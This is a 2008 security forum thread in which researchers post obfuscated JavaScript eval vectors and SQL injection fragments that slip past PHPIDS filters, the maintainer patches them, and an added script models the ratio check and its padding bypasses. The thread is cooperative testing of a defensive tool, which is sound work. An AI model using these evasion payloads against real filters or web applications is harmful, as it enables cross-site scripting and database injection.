Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Gareth Heyes
Date: January 13, 2008 02:33PM

Yeah I mentioned a while back that you should do a JS version ;)
I can't see how you can sandbox server side though

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 13, 2008 02:35PM

Spidermonkey

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Gareth Heyes
Date: January 13, 2008 02:36PM

Yeah I know you can execute javascript server side but I'd think you'd have the same problem. Unless you take the Google Caja approach


Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 13, 2008 02:44PM

Yep - and that should be a bit tooo early right now

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Reiners
Date: January 13, 2008 04:16PM

Quote

1'*@a or'1
1'*column or'1
1'*id-'0

they all still work by using some spaces:

1' * @a or '1
1' * column or '1
1' * id - '0

Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: thornmaker
Date: January 13, 2008 05:42PM

Not a Number sure acts like one. Not Not a Number is true: http://p42.us/phpids/43.html

$='e'
$x=!NaN?NaN[$+'val']:$
$x($x('nam'+$)+$)

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: tx
Date: January 14, 2008 03:02AM

@thornmaker: nice find!:)

-tx @ lowtech-labs.org

Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: thornmaker
Date: January 14, 2008 09:33PM

twins!

[p42.us]
$='e'
$x=0e0[$+'val']
$x($x('nam'+$)+$)

[p42.us]
$='e'
a:x=0e0[$+'val']
x(x('nam'+$)+$)

Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Anonymous User
Date: January 15, 2008 03:02AM

Nice - they didn't work on FF Ubuntu but I saw where this pointed at ;) Fixed!

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 17, 2008 12:51AM

It's amazing what you can do with a little $: http://p42.us/phpids/47.html

$='e'
,x=$[$+'val']
x(x('nam'+$)+$)

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 19, 2008 10:45PM

@.mario: The new filters do a good job at stopping x=0['eval'] type injections. I can get an alert through still, but haven't yet been able to inject a double eval as is often necessary for arbitrary code execution --> [demo.phpids.org] and similarly [demo.phpids.org]
0[('ev')+(n='')+(z=('al'),z)](z+'ert(0),'+/x/)
and
0[('ev')+status+(z=('al'),z)](z+'ert(0),'+/x/)



Edited 1 time(s). Last edit at 01/19/2008 10:46PM by thornmaker.

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 20, 2008 02:35AM

I had some more time to kill waiting for mythtv to compile.... [p42.us]
$x={}.eval,$x($x(('na'+status+('me')+/x/))

[edit] this one should work, but doesn't, and I can't figure out why. [p42.us]
$={}.eval,$($('na'+navigator.vendor+('me,')+/x/))



Edited 1 time(s). Last edit at 01/20/2008 03:31AM by thornmaker.

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 20, 2008 04:31AM

Hi!

Hehe - I knew the navigator properties would at some point be abused to obfuscate a vector :) I did just a slight modification to the rules but changed the centrifuge - this way all strings are detected correctly w/o too many customizations. Thx!

Greetings,
.mario



Edited 1 time(s). Last edit at 01/20/2008 04:31AM by .mario.

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 20, 2008 10:07PM

http://p42.us/phpids/50.html

$=.1.eval,$($('na'+status+('me'),1))

[edit] I don't think the centrifuge ratio check is very effective.

if($overall_length/$stripped_length <= 3.5) {
    $value .= "\n§[!!!]";
}
If this was the only thing catching an injection, it is trivial to get around. For example, if the best I could do with the above injection was
$=.1.eval,$($('na'+navigator.vendor+('me'),1))
this would presently only be blocked by this ratio check. This is trivial to get around however. For example, you can embed a bunch of white space chars at the end, embed white space characters throughout the injection, or even add in \w characters in the middle of the injection e.g. change the variable $ to $xxxxxxxxx. The rest of the centrifuge is certainly effective, and is the primary reason the injections have been diminishing over time. I just can't think of a good way to use a ratio check like this that can't be avoided with minimal effort.



Edited 1 time(s). Last edit at 01/20/2008 11:35PM by thornmaker.

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 21, 2008 02:48AM

Hi!

I know - the ratio check is still in work. I am currently testing how to avoid that problem with the \w repetition most efficiently but haven't had time to search for a solution in depth. But will be done during the next days. A quick fix will be to trim all empty spaces before the measurement but that of course isn't bulletproof either. I think I will run a series of tests either this evening or Friday - let's see what can be accomplished ;)

Greetings,
.mario

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: January 21, 2008 03:44AM

@mario

Why don't you create a alert logger that interacts with the centrifuge engine? That way the PHPIDS can fix itself ;)


Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 21, 2008 05:14AM

@Gareth:

That sounds interesting but there would be a lot of planning necessary for such a feature. This would mean a complete JS based IPS/IDS which is able to communicate with a|the server and update the centrifuge.

The current target is to get rid of the overlong concatenation rules - that demands lots of optimizations of the centrifuge first (and we are indeed pretty close to getting there). After that - let's see. I think the generic attack detection definitely has potential.

Greetings,
.mario

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 21, 2008 04:11PM

An injection can be massaged to have any [\w\s] to [^\w\s] ratio needed... I just don't see that approach ever working.

I think your present approach of filtering for 3 different classes of characters that are typically only found in code is a good way to go about it, though it does seem a bit overly complicated the way it substitutes characters, shuffles, and then matches against a regex.

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 21, 2008 04:18PM

 $xxxxxxx=.1.eval,$xxxxxxx($xxxxxxx('na'+status+('me'),1)) 

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: January 21, 2008 04:55PM

hehe cool :)


Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 21, 2008 05:30PM

Cool indeed - but anyway - the centrifuge components are still a work in progress. I will take care of that issue Wednesday evening.

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 21, 2008 05:46PM

Kay - I did a fix but it's not the nicest one. I will look deeper into that issue on Wednesday evening :)

Greetings,
.mario

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: January 21, 2008 06:35PM

Hey mario + team

You're all doing a great job btw, protecting against this stuff isn't easy and I think the PHPIDS has come a long way since the first version.


Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: tx
Date: January 21, 2008 07:51PM

thornmaker Wrote:
-------------------------------------------------------
> An injection can be massaged to have any [\w\s] to
> [^\w\s] ratio needed... I just don't see that
> approach ever working.
[snip]
> $xxxxxxx=.1.eval,$xxxxxxx($xxxxxxx('na'+status+('me'),1))

@thornmaker: I have the feeling you're probably right.
But I wonder, what about looking at unique "words" and using that count in the ratio as well, as opposed to just character classes. That is, in the vector that thornmaker posted, I see 6 unique 'words':
$xxxxxxx
1
eval
na
status
me

Although you can pretty much infinitely pad out your variable names, to a certain extent you can make that irrelevant, because a variable is only useful if it's used. I mean that a variable will have to be assigned and called, which means we should see it at least twice (in many vectors, though not all).

If that approach is taken then a variable like $x is the same as $xxxxxxxxxxxxx so long as we can 'mark' it essentially as a variable (based on the fact that it's used multiple times) and weight it accordingly.

EDIT: This can be bypassed by inserting comments containing natural looking language or by assigning values to strings that are never used, but I think it has promise:
$str_length_weight = count($unique_words)/str_len($vector); //just pseudo code, but you get the idea.

<wishful_thinking type='unrealistic'>
what phpids needs is a fully sandboxed universal parser
</wishful_thinking>

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 01/21/2008 09:58PM by tx.

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 22, 2008 12:00AM

@tx: I think inserting random code in comments is very doable, or creating dummy variables in insignificant places, or by adding strings or regular expressions in with textual data.

@Gareth (and PHP Team): I definitely agree! The project has come a long way, and the team is doing a terrific job :)

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 22, 2008 06:47AM

Thx ;)

@tx: I agree with your wishful thoughts - but there are many obstacles on the path to create a tool which utilizes that kind of helpers _and_ is still usable and compatible with most default settings. I heard about several people trying to install and use the PHPIDS and they even had difficulties in reading out the total impact from the result object - so there's no way we can expect them to install spidermonkey or similar stuff :-/

@all: The method tx mentioned is _kind of_ used at the moment as a hot fix for the weight fuzzing issue. It works fine for JS since all word character sequences longer than a certain amount are normalized to a fixed length. If you try to create noise with special chars the centrifuge method strikes again. At the moment you can circumvent this by using Unicode nodes like ß, ä and so on - see Gareth's variable tester for more *g* - I will take care of that asap - although it hurts me to have the second position in the code where \p{L} is needed...

Greetings!
.mario

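An added example (my own code, not PHPIDS's) tying together the centrifuge discussion in the posts above: a JavaScript model of the length ratio thornmaker quoted, the identifier and whitespace padding he describes, the unique-word count tx proposed, and the long-word normalisation .mario calls his hot fix. Only the 3.5 threshold comes from the quoted snippet; the stripping class [\w\s], the six-character cut-off for "long" words, the placeholder text, the rename helper and the benign and comment strings are assumptions constructed here. The posted eval vectors appear as string literals only and are never executed.

```javascript
// Added example, not PHPIDS code. Models the centrifuge ratio check quoted in
// the thread, the padding that defeats it, tx's unique-word count and .mario's
// long-word normalisation. THRESHOLD is from the quoted PHP; everything else
// (MAX_WORD, the placeholder, the [\w\s] stripping class, sample strings) is an
// assumption made for illustration.

const THRESHOLD = 3.5;
const MAX_WORD = 6; // assumed cut-off: longer runs of word characters are collapsed

// Vectors quoted from the thread; BENIGN and NOISE_COMMENT are constructed.
const EVAL_VECTOR = "$=.1.eval,$($('na'+status+('me'),1))";
const TX_VECTOR = "$xxxxxxx=.1.eval,$xxxxxxx($xxxxxxx('na'+status+('me'),1))";
const BENIGN = "thanks, see you at the office tomorrow";
const NOISE_COMMENT = "//it was a nice day at the office and we all went home early";

// Ratio check modelled on the quoted snippet: raw length divided by the length
// after word characters and whitespace are removed. A low ratio means the value
// is dense in special characters, so it is flagged.
function stripRatio(value) {
  const stripped = value.replace(/[\w\s]+/g, "");
  return stripped.length === 0 ? Infinity : value.length / stripped.length;
}
function ratioFlags(value) {
  return stripRatio(value) <= THRESHOLD;
}

// thornmaker's bypass: rename the variable `ident` to a longer name (or append
// whitespace) until the ratio climbs past the threshold. The denominator never
// changes, only the numerator grows, so every vector can be massaged through.
function padIdentifier(value, ident) {
  let name = ident;
  let padded = value;
  while (ratioFlags(padded)) {
    name += "x";
    padded = value.split(ident).join(name); // rename every occurrence
  }
  return padded;
}
function padWhitespace(value) {
  let padded = value;
  while (ratioFlags(padded)) padded += " ";
  return padded;
}

// tx's proposal: count distinct word tokens, and treat a token that appears at
// least twice as a probable variable whatever its length.
function uniqueWords(value) {
  return new Set(value.match(/\w+/g) || []);
}
function probableVariables(value) {
  const counts = new Map();
  for (const w of value.match(/\w+/g) || []) counts.set(w, (counts.get(w) || 0) + 1);
  return [...counts].filter(([, n]) => n >= 2).map(([w]) => w);
}

// .mario's hot fix: collapse every run of word characters longer than MAX_WORD
// to a fixed placeholder, then drop whitespace, before measuring. With `unicode`
// false the class is ASCII \w only, which is the \p{L} gap he mentions; with
// true it is Unicode letters and digits, so ä-padding is collapsed as well.
function normalise(value, unicode = false) {
  const cls = unicode ? "[\\p{L}\\p{N}_]" : "\\w";
  const longRun = new RegExp(`${cls}{${MAX_WORD + 1},}`, unicode ? "gu" : "g");
  return value.replace(longRun, "a".repeat(MAX_WORD)).replace(/\s+/g, "");
}
function hardenedFlags(value, unicode = false) {
  return ratioFlags(normalise(value, unicode));
}

// Side-by-side view of raw vs normalised verdicts for a list of inputs.
function report(values) {
  return values.map((v) => ({ value: v, raw: ratioFlags(v), hardened: hardenedFlags(v) }));
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(report([
    EVAL_VECTOR,
    padIdentifier(EVAL_VECTOR, "$"),
    padWhitespace(EVAL_VECTOR),
    EVAL_VECTOR + NOISE_COMMENT, // plain-English comment: beats both checks
    BENIGN,
  ]));
}
```

Run it with node. The raw ratio flags the short vector and misses both padded forms; the normalised check catches the padding again; and a trailing `//` comment of plain English, thornmaker's point about comments, slips past both, because the comment adds word characters without adding the special characters the ratio counts. That is the reason no character-class ratio on its own can hold.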
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Reiners
Date: January 22, 2008 09:39AM

Quote

Hey mario + team

You're all doing a great job btw, protecting against this stuff isn't easy and I think the PHPIDS has come a long way since the first version.

very true! that's why tiny slips are no problem ;)

1' *id-'0

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 22, 2008 09:40AM

The centrifuge can also be circumvented by staying under 30 chars (22 to be exact!): http://p42.us/phpids/51.html
and a much longer example which messes with any ratio detection: http://p42.us/phpids/51a.html

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 22, 2008 11:37AM

Yikes - comments.. Who invented those double-slashers ;)

Anyway: I fixed the problem and during the process I reviewed the rules some more and deleted loads of stuff we could have thrown away weeks ago. Which is good. All injections are fixed - including the SQLIs that slipped through somehow. 10x!

Current revision: 26955 bytes
Last revision: 27929 bytes

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 22, 2008 12:44PM

http://p42.us/phpids/52.html

$=.7.eval,$($('\rname'),1)

for the record: \f \t \r and \n all seem to work... can I buy a vowel? :)



Edited 1 time(s). Last edit at 01/22/2008 12:47PM by thornmaker.
